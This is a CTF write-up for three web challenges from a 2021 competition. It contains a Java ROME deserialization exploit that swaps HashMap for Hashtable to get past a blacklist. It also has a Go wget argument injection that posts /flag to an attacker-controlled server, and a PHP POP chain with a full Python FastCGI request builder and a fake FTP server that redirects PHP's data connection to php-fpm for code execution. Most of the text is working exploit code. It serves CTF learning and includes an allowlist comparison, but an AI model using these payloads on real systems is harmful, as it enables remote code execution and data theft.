陇原战疫2021-WEB-WriteUp

EasyJaba

I get the feeling that challenges which open straight with a deserialization entry point won't show up much anymore. It's a bit like the early days when PHP first got used for CTF problems; this kind of challenge mostly helps a noob like me brush up on the basics. If the Java challenges were any harder I wouldn't be able to do them anyway, hahaha.

```java
// BlacklistObjectInputStream: resolveClass() rejects two class names by exact string match
protected Class<?> resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {
    if (this.blacklist.contains(cls.getName())) {
        throw new InvalidClassException("Unexpected serialized class", cls.getName());
    } else {
        return super.resolveClass(cls);
    }
}

Set blacklist = new HashSet() {
    {
        this.add("java.util.HashMap");
        this.add("javax.management.BadAttributeValueExpException");
    }
};
```

Those two classes are blocked, but the application ships the rome dependency (com.sun.syndication.*), so the ROME ObjectBean chain to TemplatesImpl is still on the classpath; the only thing in the way is the HashMap entry point.

Swapping the HashMap for a Hashtable is enough: Hashtable is not on the blacklist, and its readObject() also calls hashCode() on every key it reconstitutes, which is what kicks off ObjectBean.hashCode().

```java
package lyzy.ctf.ezjaba.payload;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;

import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Hashtable;

// Reflections and Serialize are ysoserial-style helpers (getField/setAccessible/
// setFieldValue, and ObjectOutputStream serialisation); evil is the attacker's
// class, compiled separately. Neither is shown in this writeup.
public class exp {
    public static void main(String[] args) throws Exception {

        // Build a TemplatesImpl carrying the malicious class bytecode
        InputStream inputStream = evil.class.getResourceAsStream("evil.class");
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        byte[] chunk = new byte[4096];
        for (int n; (n = inputStream.read(chunk)) != -1; ) {
            buf.write(chunk, 0, n);
        }
        byte[] bytes = buf.toByteArray();

        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(), "_bytecodes");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(tmpl, "_bytecodes", new byte[][]{bytes});

        Field name = Reflections.getField(tmpl.getClass(), "_name");
        Reflections.setAccessible(name);
        Reflections.setFieldValue(tmpl, "_name", "Siebene");
        Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());

        // Wrap TemplatesImpl in an ObjectBean so its ToStringBean is also backed by
        // TemplatesImpl: toString() walks the getters and reaches getOutputProperties()
        ObjectBean delegate = new ObjectBean(Templates.class, tmpl);

        // Outer ObjectBean: its hashCode() goes through EqualsBean.beanHashCode(),
        // which calls toString() on the wrapped object. Start with a harmless one.
        ObjectBean root = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "Sie"));

        // Hashtable (not on the blacklist) calls key.hashCode() in readObject()
        Hashtable map = new Hashtable();
        map.put(root, "Sie");

        // Only after put() swap in the real delegate via reflection,
        // so the chain does not fire locally while building the payload
        Field field = ObjectBean.class.getDeclaredField("_equalsBean");
        field.setAccessible(true);
        field.set(root, new EqualsBean(ObjectBean.class, delegate));
        System.out.print(Serialize.serialize(map));
    }
}
```

For evil.class, the generic Spring echo class works; the one from my last writeup is fine.
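To make the bypass concrete, here is an added example (my own code, not from the writeup or the challenge) that walks a Java serialization stream the way resolveClass() would, one class descriptor at a time, and applies the challenge's blacklist beside an allowlist. The streams are hand-assembled skeletons (zeroed serialVersionUID, no fields) built only so the scanner has something to read; the allowlist contents are an assumption about what the application legitimately deserializes.

```python
"""Added example: what a resolveClass()-style name blacklist sees in a Java
serialization stream, and why swapping the entry class from HashMap to
Hashtable gets past it while an allowlist does not."""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"          # ObjectOutputStream magic + version 5
TC_OBJECT, TC_CLASSDESC, TC_ENDBLOCKDATA, TC_NULL = 0x73, 0x72, 0x78, 0x70
SC_SERIALIZABLE = 0x02

# Blacklist copied from the challenge; the allowlist is an assumed set of
# classes the application legitimately needs to deserialize.
BLACKLIST = {"java.util.HashMap", "javax.management.BadAttributeValueExpException"}
ALLOWLIST = {"java.lang.String", "java.util.ArrayList"}

# Dotted Java class names only; primitive/array descriptors like "[B" are not handled.
JAVA_NAME = re.compile(r"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+")


def class_desc(name: str) -> bytes:
    """TC_OBJECT + TC_CLASSDESC skeleton for `name` (constructed, not JVM output)."""
    utf = name.encode()
    return (bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(utf)) + utf
            + b"\x00" * 8                         # serialVersionUID placeholder
            + bytes([SC_SERIALIZABLE])
            + b"\x00\x00"                         # field count: none
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))  # no annotations, no superclass


def class_names(stream: bytes) -> list:
    """Return the class names of every TC_CLASSDESC in stream order.

    Crude scan: at each 0x72 byte read a modified-UTF (u2 length + bytes) and
    keep it if it parses as a dotted Java class name. This is the same
    information resolveClass() is handed, one descriptor at a time."""
    names, i = [], 0
    while i < len(stream) - 3:
        if stream[i] == TC_CLASSDESC:
            n = struct.unpack(">H", stream[i + 1:i + 3])[0]
            cand = stream[i + 3:i + 3 + n]
            if n and len(cand) == n and JAVA_NAME.fullmatch(cand.decode("latin-1")):
                names.append(cand.decode("latin-1"))
                i += 3 + n
                continue
        i += 1
    return names


def blacklist_rejects(stream: bytes) -> list:
    """Names the challenge's blacklist would throw InvalidClassException for."""
    return [n for n in class_names(stream) if n in BLACKLIST]


def allowlist_rejects(stream: bytes) -> list:
    """Names an allowlist filter (JEP 290 style) would reject."""
    return [n for n in class_names(stream) if n not in ALLOWLIST]


# ROME gadget chain from the writeup, behind two different entry classes.
GADGETS = ["com.sun.syndication.feed.impl.ObjectBean",
           "com.sun.syndication.feed.impl.EqualsBean",
           "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"]
HASHMAP_PAYLOAD = STREAM_MAGIC + b"".join(class_desc(c) for c in ["java.util.HashMap"] + GADGETS)
HASHTABLE_PAYLOAD = STREAM_MAGIC + b"".join(class_desc(c) for c in ["java.util.Hashtable"] + GADGETS)

if __name__ == "__main__":
    for label, payload in (("HashMap", HASHMAP_PAYLOAD), ("Hashtable", HASHTABLE_PAYLOAD)):
        print(label, "blacklist rejects:", blacklist_rejects(payload))
        print(label, "allowlist rejects:", allowlist_rejects(payload))
```

The blacklist only ever matches the exact entry-class name, so every gadget class after it is waved through and a different collection type is enough to slip past; the allowlist rejects the Hashtable payload on its first descriptor and never gets as far as the ROME classes.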

CheckIN

A simple Go code audit.

The wget endpoint takes its arguments from repeated argv parameters, so --post-file uploads /flag to a server we control:

/wget?argv=1&argv=--post-file&argv=/flag&argv=http://ip

eaaasyphp

The FTP passive-mode trick, which has been done to death by now.

```php
<?php

class Check {
    public static $str1 = false;   // set by Esle::__wakeup()
    public static $str2 = false;   // set by Welcome::__invoke()
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {


    public function __wakeup(){

        $this->hint = "no hint";
    }

    public function __destruct(){

        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}


class Bunny {
    public function __construct(){
        // attacker-controlled FTP server; PHP writes $data there through the ftp:// wrapper
        $this->filename="ftp://ip:port/";
    }

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                echo "done !!!!\n";
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {

    public function __construct(){
        $this->username=new Bunny();
    }
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;   // string concatenation triggers Bunny::__toString()
    }
}

class Bypass {

    public function __construct($s){
        if($s==1){
            $this->str4=new Welcome();
        }
        else{
            $this->str=new Hint();
        }
    }

    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();   // invokes Welcome::__invoke()
        } else {
            throw new Error("Error");
        }
    }
}

// Esle comes first so its __wakeup() sets str1 before Bypass::__destruct() runs;
// Bypass(1) holds the Welcome that flips str2 and stringifies Bunny.
echo urlencode(serialize(array(new Esle(),new Bypass(1))));
```

Then send ?data=xxxxxxxx, where data is the raw FastCGI request bytes aimed at php-fpm: the attacker's FTP server answers PASV with 127.0.0.1 and php-fpm's port (9000 by default), so PHP's data connection, and $data with it, lands on the local php-fpm listener.
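The attacker side of that trick, as an added example (my own code, not from the writeup or the challenge): a FastCGI encoder that produces the bytes to put in ?data=, and a minimal FTP responder that answers PHP's ftp:// write dialogue and points the data connection at 127.0.0.1:9000. The php-fpm address and port, the script path /var/www/html/index.php and the prepended PHP are all assumptions; the script path must be a file that really exists on the target.

```python
"""Added example: FastCGI request builder plus a fake FTP server whose PASV reply
redirects PHP's file_put_contents("ftp://...") data connection to php-fpm."""
import socket
import struct

FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def fcgi_record(rtype: int, content: bytes, request_id: int = 1) -> bytes:
    """One FastCGI record: 8-byte header, content, padding to a multiple of 8."""
    pad = (-len(content)) % 8
    header = struct.pack(">BBHHBB", 1, rtype, request_id, len(content), pad, 0)
    return header + content + b"\x00" * pad


def encode_nv(name: str, value: str) -> bytes:
    """Name-value pair; lengths < 128 take one byte, longer ones four with the top bit set."""
    def length(n: int) -> bytes:
        return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    n, v = name.encode(), value.encode()
    return length(len(n)) + length(len(v)) + n + v


def build_fastcgi_request(script_path: str, php_code: bytes) -> bytes:
    """BEGIN_REQUEST + PARAMS + empty PARAMS + STDIN + empty STDIN.

    PHP_VALUE/PHP_ADMIN_VALUE make php-fpm prepend php://input (our STDIN) to
    the existing script, so php_code runs without writing any file.
    script_path must be a PHP file that exists on the target (assumed)."""
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script_path,
        "SCRIPT_NAME": script_path,
        "REQUEST_URI": script_path,
        "DOCUMENT_ROOT": "/",
        "SERVER_PROTOCOL": "HTTP/1.1",
        "REMOTE_ADDR": "127.0.0.1",
        "REMOTE_PORT": "9985",
        "SERVER_ADDR": "127.0.0.1",
        "SERVER_PORT": "80",
        "SERVER_NAME": "localhost",
        "CONTENT_TYPE": "application/text",
        "CONTENT_LENGTH": str(len(php_code)),
        "PHP_VALUE": "auto_prepend_file = php://input",
        "PHP_ADMIN_VALUE": "allow_url_include = On",
    }
    # All pairs fit in one record here; more than 65535 bytes would need splitting.
    param_bytes = b"".join(encode_nv(k, v) for k, v in params.items())
    return (fcgi_record(FCGI_BEGIN_REQUEST, struct.pack(">HB5x", FCGI_RESPONDER, 0))
            + fcgi_record(FCGI_PARAMS, param_bytes)
            + fcgi_record(FCGI_PARAMS, b"")
            + fcgi_record(FCGI_STDIN, php_code)
            + fcgi_record(FCGI_STDIN, b""))


def pasv_reply(host: str, port: int) -> str:
    """227 line that sends the client's data connection to host:port."""
    return "227 Entering Passive Mode (%s,%d,%d)." % (host.replace(".", ","), port // 256, port % 256)


# Replies PHP's ftp:// wrapper needs for a write. SIZE must not be 2xx or PHP
# refuses to overwrite; EPSV is refused so the client falls back to PASV,
# where we (not the client) choose the IP of the data connection.
REPLIES = {b"USER": b"331 ok\r\n", b"PASS": b"230 ok\r\n", b"TYPE": b"200 ok\r\n",
           b"SIZE": b"550 no\r\n", b"EPSV": b"500 no\r\n", b"STOR": b"150 go\r\n"}


def serve_ftp_once(listen_port: int, data_host: str = "127.0.0.1", data_port: int = 9000) -> None:
    """Handle one control connection; after STOR the client writes $data to data_host:data_port."""
    with socket.create_server(("0.0.0.0", listen_port)) as srv:
        conn, _ = srv.accept()
        with conn, conn.makefile("rb") as lines:
            conn.sendall(b"220 ready\r\n")
            for line in lines:
                cmd = line.split(b" ", 1)[0].strip().upper()
                if cmd == b"QUIT":
                    conn.sendall(b"221 bye\r\n")
                    break
                if cmd == b"PASV":
                    reply = (pasv_reply(data_host, data_port) + "\r\n").encode()
                else:
                    reply = REPLIES.get(cmd, b"200 ok\r\n")
                conn.sendall(reply)


if __name__ == "__main__":
    # ?data= carries these bytes (URL-encoded); then run the FTP side and trigger the chain.
    payload = build_fastcgi_request("/var/www/html/index.php", b"<?php system('cat /flag'); ?>")
    print(payload.hex())
    serve_ftp_once(2121)
```

The FTP side never touches the data connection itself: PHP opens it to whatever address the 227 line names, so php-fpm sees a connection from 127.0.0.1 and a well-formed FastCGI request, which is why a listener bound to localhost only is no protection here.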

There were two more challenges. One was an SMTP one I didn't have time to look at during the contest; I understood it after reading guoke's writeup later.

The other, an RSS blog one, also went unsolved; it will probably be reused next time.